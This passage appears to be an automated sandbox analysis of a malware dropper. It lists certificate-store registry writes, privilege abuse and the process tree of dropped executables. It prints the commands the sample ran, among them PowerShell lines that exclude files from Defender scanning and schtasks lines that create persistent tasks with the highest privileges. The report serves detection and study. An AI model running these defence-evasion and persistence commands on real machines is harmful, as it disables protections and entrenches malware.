Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mQxBvlTA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	MStore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	MStore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	MStore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	mQxBvlTA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	New Text Document mod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mQxBvlTA.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mQxBvlTA.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1320 PING.EXE

pid	process
1320	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

xIPJVPDq.exeVoSjPBcc.execrypted6077866846MVYQY.exedisable-defender.exepowershell.exe

pid	process
2720	xIPJVPDq.exe
2720	xIPJVPDq.exe
2720	xIPJVPDq.exe
2720	xIPJVPDq.exe
1552	VoSjPBcc.exe
1552	VoSjPBcc.exe
1552	VoSjPBcc.exe
1552	VoSjPBcc.exe
3024	crypted6077866846MVYQY.exe
1200	disable-defender.exe
2288	powershell.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe
3024	crypted6077866846MVYQY.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

New Text Document mod.exexIPJVPDq.exeVoSjPBcc.execrypted6077866846MVYQY.exemQxBvlTA.exedisable-defender.exeresponsibilitylead.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2784	New Text Document mod.exe
Token: SeDebugPrivilege	2720	xIPJVPDq.exe
Token: SeDebugPrivilege	1552	VoSjPBcc.exe
Token: SeDebugPrivilege	3024	crypted6077866846MVYQY.exe
Token: SeDebugPrivilege	2464	mQxBvlTA.exe
Token: SeDebugPrivilege	1200	disable-defender.exe
Token: SeImpersonatePrivilege	1200	disable-defender.exe
Token: SeDebugPrivilege	1836	responsibilitylead.exe
Token: SeDebugPrivilege	2288	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

wininit.exe

pid process

2732 wininit.exe
2732 wininit.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

wininit.exe

pid process

2732 wininit.exe
2732 wininit.exe

pid	process
2732	wininit.exe
2732	wininit.exe

pid	process
2732	wininit.exe
2732	wininit.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

New Text Document mod.exexIPJVPDq.exepclient.exeMStore.execmd.exe

description	pid	process	target process
PID 2784 wrote to memory of 2464	2784	New Text Document mod.exe	mQxBvlTA.exe
PID 2784 wrote to memory of 2464	2784	New Text Document mod.exe	mQxBvlTA.exe
PID 2784 wrote to memory of 2464	2784	New Text Document mod.exe	mQxBvlTA.exe
PID 2784 wrote to memory of 2464	2784	New Text Document mod.exe	mQxBvlTA.exe
PID 2784 wrote to memory of 2720	2784	New Text Document mod.exe	xIPJVPDq.exe
PID 2784 wrote to memory of 2720	2784	New Text Document mod.exe	xIPJVPDq.exe
PID 2784 wrote to memory of 2720	2784	New Text Document mod.exe	xIPJVPDq.exe
PID 2784 wrote to memory of 2720	2784	New Text Document mod.exe	xIPJVPDq.exe
PID 2720 wrote to memory of 1552	2720	xIPJVPDq.exe	VoSjPBcc.exe
PID 2720 wrote to memory of 1552	2720	xIPJVPDq.exe	VoSjPBcc.exe
PID 2720 wrote to memory of 1552	2720	xIPJVPDq.exe	VoSjPBcc.exe
PID 2720 wrote to memory of 1552	2720	xIPJVPDq.exe	VoSjPBcc.exe
PID 2784 wrote to memory of 3024	2784	New Text Document mod.exe	crypted6077866846MVYQY.exe
PID 2784 wrote to memory of 3024	2784	New Text Document mod.exe	crypted6077866846MVYQY.exe
PID 2784 wrote to memory of 3024	2784	New Text Document mod.exe	crypted6077866846MVYQY.exe
PID 2784 wrote to memory of 3024	2784	New Text Document mod.exe	crypted6077866846MVYQY.exe
PID 2784 wrote to memory of 452	2784	New Text Document mod.exe	i1gcbW1E.exe
PID 2784 wrote to memory of 452	2784	New Text Document mod.exe	i1gcbW1E.exe
PID 2784 wrote to memory of 452	2784	New Text Document mod.exe	i1gcbW1E.exe
PID 2784 wrote to memory of 1200	2784	New Text Document mod.exe	disable-defender.exe
PID 2784 wrote to memory of 1200	2784	New Text Document mod.exe	disable-defender.exe
PID 2784 wrote to memory of 1200	2784	New Text Document mod.exe	disable-defender.exe
PID 2784 wrote to memory of 1592	2784	New Text Document mod.exe	pclient.exe
PID 2784 wrote to memory of 1592	2784	New Text Document mod.exe	pclient.exe
PID 2784 wrote to memory of 1592	2784	New Text Document mod.exe	pclient.exe
PID 1592 wrote to memory of 1836	1592	pclient.exe	responsibilitylead.exe
PID 1592 wrote to memory of 1836	1592	pclient.exe	responsibilitylead.exe
PID 1592 wrote to memory of 1836	1592	pclient.exe	responsibilitylead.exe
PID 2784 wrote to memory of 2276	2784	New Text Document mod.exe	MStore.exe
PID 2784 wrote to memory of 2276	2784	New Text Document mod.exe	MStore.exe
PID 2784 wrote to memory of 2276	2784	New Text Document mod.exe	MStore.exe
PID 2276 wrote to memory of 2312	2276	MStore.exe	cmd.exe
PID 2276 wrote to memory of 2312	2276	MStore.exe	cmd.exe
PID 2276 wrote to memory of 2312	2276	MStore.exe	cmd.exe
PID 2312 wrote to memory of 2288	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2288	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2288	2312	cmd.exe	powershell.exe
PID 2784 wrote to memory of 392	2784	New Text Document mod.exe	Props.exe
PID 2784 wrote to memory of 392	2784	New Text Document mod.exe	Props.exe
PID 2784 wrote to memory of 392	2784	New Text Document mod.exe	Props.exe
PID 2784 wrote to memory of 2732	2784	New Text Document mod.exe	wininit.exe
PID 2784 wrote to memory of 2732	2784	New Text Document mod.exe	wininit.exe
PID 2784 wrote to memory of 2732	2784	New Text Document mod.exe	wininit.exe
PID 2784 wrote to memory of 2732	2784	New Text Document mod.exe	wininit.exe
PID 2784 wrote to memory of 3036	2784	New Text Document mod.exe	1234.exe
PID 2784 wrote to memory of 3036	2784	New Text Document mod.exe	1234.exe
PID 2784 wrote to memory of 3036	2784	New Text Document mod.exe	1234.exe
PID 2784 wrote to memory of 3036	2784	New Text Document mod.exe	1234.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 680	2784	New Text Document mod.exe	ISetup8.exe
PID 2784 wrote to memory of 2144	2784	New Text Document mod.exe	test2.exe
PID 2784 wrote to memory of 2144	2784	New Text Document mod.exe	test2.exe
PID 2784 wrote to memory of 2144	2784	New Text Document mod.exe	test2.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784

C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe
"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe
"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720

C:\Users\Admin\AppData\Local\Temp\VoSjPBcc.exe
"C:\Users\Admin\AppData\Local\Temp\VoSjPBcc.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
2⤵
- Executes dropped EXE
PID:452

C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe
"C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
"C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1592

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsibilitylead.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsibilitylead.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Users\Admin\AppData\Local\Temp\a\MStore.exe
"C:\Users\Admin\AppData\Local\Temp\a\MStore.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Add-MpPreference -ExclusionExtension .exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension .exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\SysWOW64\MService.exe
"C:\Windows\SysWOW64\MService.exe"
3⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\a\Props.exe
"C:\Users\Admin\AppData\Local\Temp\a\Props.exe"
2⤵
- Executes dropped EXE
PID:392

C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2732

C:\Users\Admin\AppData\Local\Temp\a\1234.exe
"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
2⤵
- Executes dropped EXE
PID:3036

C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
2⤵
- Executes dropped EXE
PID:680

C:\Users\Admin\AppData\Local\Temp\uiw.0.exe
"C:\Users\Admin\AppData\Local\Temp\uiw.0.exe"
3⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\uiw.1.exe
"C:\Users\Admin\AppData\Local\Temp\uiw.1.exe"
3⤵
PID:1648

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
4⤵
PID:2504

C:\Users\Admin\AppData\Local\Temp\a\test2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
2⤵
- Executes dropped EXE
PID:2144

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
PID:2244

C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
2⤵
PID:800

C:\Users\Admin\AppData\Local\Temp\um8.0.exe
"C:\Users\Admin\AppData\Local\Temp\um8.0.exe"
3⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\um8.1.exe
"C:\Users\Admin\AppData\Local\Temp\um8.1.exe"
3⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
2⤵
PID:568

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
PID:2088

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- Creates scheduled task(s)
PID:2712

C:\Users\Admin\AppData\Local\Temp\a\555.exe
"C:\Users\Admin\AppData\Local\Temp\a\555.exe"
2⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
2⤵
PID:1032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:3060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
3⤵
PID:1060

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCBD.tmp"
3⤵
- Creates scheduled task(s)
PID:2276

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:1712

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
4⤵
PID:1280

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
5⤵
- Creates scheduled task(s)
PID:1756

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4E8D.tmp.bat""
4⤵
PID:2752

C:\Windows\SysWOW64\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:2272

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
5⤵
PID:2328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:2000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
6⤵
PID:344

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBECD.tmp"
6⤵
- Creates scheduled task(s)
PID:2456

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:2880

C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
2⤵
PID:2636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
3⤵
PID:2460

C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe
"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"
2⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
2⤵
PID:2508

C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
2⤵
PID:488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2316

